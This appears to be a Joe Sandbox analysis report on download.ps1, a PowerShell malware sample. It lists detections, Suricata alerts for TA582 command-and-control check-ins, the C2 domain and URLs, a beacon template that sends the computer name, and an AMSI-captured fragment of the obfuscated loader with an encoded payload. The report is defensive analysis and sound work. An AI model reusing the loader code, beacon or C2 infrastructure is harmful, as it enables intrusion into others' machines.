Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1581678
MD5:9616cd49c942d68e9ca060039e8f1a5a
SHA1:2c2279f2b1699a4289d863ad18927760f3f72f69
SHA256:f1bdcf83f4d16a253f1318895e44e4b9e3ae477c37d177d58a68b27df0e84510
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 5180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5076, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5180, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5076, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5180, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-28T15:34:10.597350+010020577411A Network Trojan was detected192.168.11.204974545.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-28T15:34:10.069015+010028594051Domain Observed Used for C2 Detected192.168.11.20588981.1.1.153UDP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-28T15:34:10.597350+010018100001Potentially Bad Traffic192.168.11.204974545.61.136.13880TCP
2024-12-28T15:34:11.181340+010018100001Potentially Bad Traffic192.168.11.2049746142.251.32.10080TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://gajaechkfhfghal.topAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 8%Perma Link
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.14103932163.000001FBF83C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb.ps18 source: powershell.exe, 00000000.00000002.14107344873.000001FBF8839000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.14103932163.000001FBF83C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbi source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.14108380547.000001FBF8BF1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Rn.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF8792000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdblity.pdb source: powershell.exe, 00000000.00000002.14101066352.000001FBF6408000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdbpdblib.pdbC source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tion.pdbl source: powershell.exe, 00000000.00000002.14105281247.000001FBF8722000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.14105281247.000001FBF87C9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859405 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:58898 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49746 -> 142.251.32.100:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.20:49745 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.20:49745 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Cookie: NID=520=pt9TUKQKIKg5kixxFe3zUCPX_ogn65grsG74oi4JK3GN21AJ8vP302E-xBl1pJpHKGQ9JZcBWXx__5ZgseQniLqs0afOAIg9MpjuiT4XynQx4s1GhwcJIU89fZd8daxwNaYPcJzgBA3QgKOYde8nCb8jX-c3tr5cogiuTSh9Sxps4DqiKJhr5I3eCzIH8BL945ng
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=pt9TUKQKIKg5kixxFe3zUCPX_ogn65grsG74oi4JK3GN21AJ8vP302E-xBl1pJpHKGQ9JZcBWXx__5ZgseQniLqs0afOAIg9MpjuiT4XynQx4s1GhwcJIU89fZd8daxwNaYPcJzgBA3QgKOYde8nCb8jX-c3tr5cogiuTSh9Sxps4DqiKJhr5I3eCzIH8BL945ng
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gajaechkfhfghal.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJIBpqQdPEUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comCookie: NID=520=pt9TUKQKIKg5kixxFe3zUCPX_ogn65grsG74oi4JK3GN21AJ8vP302E-xBl1pJpHKGQ9JZcBWXx__5ZgseQniLqs0afOAIg9MpjuiT4XynQx4s1GhwcJIU89fZd8daxwNaYPcJzgBA3QgKOYde8nCb8jX-c3tr5cogiuTSh9Sxps4DqiKJhr5I3eCzIH8BL945ng
Source: global trafficDNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.14076096345.000001FB80E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?
Source: powershell.exe, 00000000.00000002.14076096345.000001FB80E07000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$vzploqw2791ibgs/$c7enaim3uwl25kr.php?id=$env:computername&key=$wybfhujxloid&s=527
Source: powershell.exe, 00000000.00000002.14103932163.000001FBF843F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.14103932163.000001FBF83C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.14107262863.000001FBF882F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic#
Source: powershell.exe, 00000000.00000002.14107869531.000001FBF8B70000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14105089144.000001FBF85C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micr
Source: powershell.exe, 00000000.00000002.14107869531.000001FBF8B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micrl/produc4
Source: powershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB8107C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.14076096345.000001FB8107C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527
Source: powershell.exe, 00000000.00000002.14076096345.000001FB8107C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527p
Source: powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.14076096345.000001FB80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhsHLU9-5UL4EauT7WlP0WR6aChLaO330w5Xq2eIOSGTJI
Source: powershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgSaEMDcGOKYwLsGIjDmmjf5RfoXynhs
Source: powershell.exe, 00000000.00000002.14076096345.000001FB80D83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com8
Source: powershell.exe, 00000000.00000002.14103932163.000001FBF843F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.14076096345.000001FB80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.14076096345.000001FB801CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.14076096345.000001FB81F1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.14095960690.000001FB90075000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.14103932163.000001FBF843F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.14076096345.000001FB812FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81328000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB80D94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.14076096345.000001FB81316000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C682490_2_00007FFCA0C68249
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0C68FF90_2_00007FFCA0C68FF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFCA0D29DE70_2_00007FFCA0D29DE7
Source: classification engineClassification label: mal80.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2436:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqkh00sy.tnc.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ifb4x9psmj56dhe.((-join (@((4710-4643),(6225-6114),(359184/3207),(1718-(2575-(7006392/7164))),(-3710+(-2053+(-2335+8182))),(-413+(10129-(9318+287))))| ForEach-Object { [char]$_ })))( $70mpysglevjh54o ) $ifb4x9psmj56dhe.((-join (@((-4350+(7035-2618)),(860544/(14409-6441)),(1085358/(14039-4261)),(7494-7379),(5624-(-289+(57910768/(17242-7278)))))| ForEach-Object { [char]$_ })))()$1v2x8rlnf3tsmyj.(([system.String]::new(@((10213-(102373140/(83888260/8314))),(363528/3366),(2980-2869),(347875/3025),(794466/(3801+(5440-1375)))))))()[byte[]] $ztixe53dasvyqbo = $70mpysglevjh54o.(([char[]]@((-5775+(59211054/(17847-(8951-(-1751+2961))))),(41292/372),(-9158+9223),(-6826+6940),(-3747+3861),(6346-6249),(-8771+(18490-9598))) -join ''))() $n92kdm486hwti7u=$ztixe53dasvyqbo return $n92kdm486hwti7u}[System.Text.Encoding]::ascii.(([char[]]@((8044-7973),(360267/(3080+487)),(-3874+(22312080/(598344/(-5590+(31322106/5498))))),(6835-(2565760/(-6814+(16115-(15695-6774))))),(-4290+4406),(-5043+(1645083/319)),(-1116+(-5478+6699)),(5714-5604),(-1350+(-5961+7414))) -join ''))((xq9dip80arvkgj5hz43subynl6e "fbw8MzlpNWhyZtn3uVkpZEvvmku2icQKUgRPlOSDQFYudmYL8P5hVbmRF3/wdyR5R+aWe6NLGKHxEbuctd15YQsA7Pa6alCa0oxPnmycKsLcgcds/e5LPGf1qVVPWo2Zm8AbTUEbzIavr42QofAzdNbnqzYreOv2XAoPjgUTQpGehpyim/xDtG4Gu/dLuIqMs9LIbN4WDBMLGAESFsbh1tiM4POrpZk29U2MroZUDlarCosG2Rod/ADQ6H8tuTYaDO6SaVIDW2Hb0Gm0/Yw/VtNXEBXnNII4qBLEdjbIIdcaG13WrOyqT6AUeQnR6Y35gIvBHcFXWvORRLWux5Ds3v7YjFaxjOk29hx46AAeok+ZHmSWJHgV/AST99ct7dGvx05jRlA2bqZ9eTxeLOuX1O0613PTAsplS3KKionHjbOviwaJVW+oRJQvW4zN2O8hFG2GvJScqTEFCeG0nV7H5IriylAKnAaVmaRbvKc3WxaqGomfh9bxBD6WjpEPodoVn9HJqPLK4mfJ3MhTXErF/q42q3bLsxpNvQqjesXIrj7hgRliXuRoQaPfBKzQGZ/kdsJbLHsCBt9Y3amRyvaRA8J3QG3oSRx46UBHORey+jvaFfwqWebyFa531rQUEQI1uwzp+Iqq+A3byAajue7j9xfOrZTCa62aP/h7cMkEP12QjXPzGUEIKUKwL0/LCkc8+IvTn1W6Nx+jwAVODGRPr0RD4BagGhpYVbpORdfIjt5i3isYXkbXvwtC07OqxDjO24eLWtIH37W4jVJXVewqiM+5kl4zcBTKMULpq1q57N82jhG9sDV79jr9RClYu5Ihcu6itZPpxE1hsE7dU4d5H7cMhBFKwaMYtNsfCP4aI6frk/vFkVeBns059ortaaMwN2wXn647Tr640mrR9H+6/wf9C+a9YVmrk+eomQ/f0jIkOUzJMnW490yBSNVUHb+U9NFo4JcRW1HnNSmKtgzjO1URnlasoZeP6VgXX2vhDESy2EqzH0Oii8Ne7LGapi4aV19ZAqn4YGGVGhCwsY1dhhN2zQuqXWXS83+tsPbWFEcA+UkTkcHMwdCi2KmTo6G6jPD7LcW6ut82DEd0H4CFLMTVzJmWi49MrWhqTsKH0YSOv4AT0epCU/5u++sSgUXgcIsAUfU+QyHxYzQCjaAZDLD4jWDHdiPFT0uw66HhmyICUdop4E7v537yEn8x4dt1D0mK2Ejfke/9z35thKHpJzVyOdFUoed8rSiP7qQmKdJdenGQLhtFtqEU08tyAdja1oWAJ0BBh0tRqBhKam3I1xp0CVdKHwecdBKGFAO5t50bNXOhWtietlZU1Cng8KSfZhZz8khIaeHrf5CCIBa0vcRFm+m/Zj6g8YVSPt6yeq2JaOrVGMjQy9uF8JGVy8WgnYsKbbYURl/dPlgXn/oDM1hupnzdXztOWHywCogyKU55ML2dijrQbsv3po6yLraPAb6NHQzSjypnd7/CNPc2cyh9pZBIK82+2PVRQx2WJzT/hXeHYI9TImULWDv3tpjgZmCwYZLH1PJhHpBRi0bi5xr5NcfYOnecyI96iv3AwFaFwX+dOYmmEfDHrMtWc3ijEZ9h0o9w7Z2RWYtxKbc7nRdAmARwG307QU6chjvFc6xoLhc4YPgB1ENkoagm+F6bzxiUdA/vbfPjQ2dwd3AWNB7XHlH90198/05QXCbAjCc27qXS5bYTAoaEEay0A8jdfTOGYNJZVxk9qUpzXPMw4l6r+l8nQ9z/H/tEHkEF7RW5xENbXNy6n+MCtuuXEITirkddIqnnFekc1Imtbv7Dmk/6Pcz5JmuFCWQ5SjH6fcJksvkY/
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 8%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
